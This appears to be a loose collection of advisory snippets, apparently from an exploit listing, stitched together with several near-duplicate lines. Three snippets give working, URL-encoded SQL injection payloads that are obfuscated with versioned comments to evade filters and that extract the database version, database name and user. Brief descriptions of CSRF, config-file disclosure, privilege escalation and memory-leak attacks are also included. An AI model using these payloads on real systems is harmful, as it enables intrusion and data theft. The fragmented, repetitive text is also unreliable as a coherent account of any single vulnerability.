The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/category/[SQL] %2d%33%20%20%2f%2a%21%30%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%31%31%31%31%41%4c%4c%2a%2f%20%2f%2a%21%30%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%43%4f%4e%43%41%54%28%44%61%74%61%62%61%73%65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44%41%54%41%42%41%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%28%29%29%2d%2d%20%2d
The vulnerability allows an attacker to inject sql commands....
The vulnerability allows an attacker to inject sql commands into the vulnerable application.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/site_search.php?s_vehicletype=auto&s_order=[SQL]&s_row=[SQL]%35%31%20%2f%2a%21%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%35%35%35%35%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%30%35%35%35%35%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%2c%64%61%74%61%62%61%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d
RSVP Invitation Online 1.0 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML page that when visited by an authenticated user, can update the admin password without the user's knowledge. This can be done by sending a POST request to the account.php page with the new password and confirmation parameters.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/search/?q=&price_type=range&price=[SQL] %31%30%30%20%61%6e%64%28%73%65%6c%65%63%74%21%56%65%72%41%79%61%72%69%2d%7e%30%2e%20%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%56%65%72%73%69%6f%6e%28%29%29%29%79%29%78%29
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'company_id' of the 'index.php' page.
The gzipped telephone system configuration file 'config.gz' or 'config.pcpx' that contains the unencrypted data file 'conf.pcpn', can be downloaded by an attacker from the root directory if previously generated by a privileged user. Attacker can also sniff the network and hijack the session id which resides in a GET request to further generate the config file. The sessionid can also be brute-forced because of its predictability containing 5-digit number. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation, system access and denial of service via config modification.
This exploit is used to gain privilege escalation on HP Connected Backup version 8.8.2.0 on Windows 7 x64. It involves copying cmd.exe to a world-writeable folder, creating a backup for the file, and then using the backup to gain privilege escalation.
A vulnerability in RAVPower devices allows an attacker to remotely disclose the stack memory of the device. This is achieved by sending a specially crafted HTTP request to the device, which contains a large number of '%0a' characters. This causes the stack memory to be returned in the response.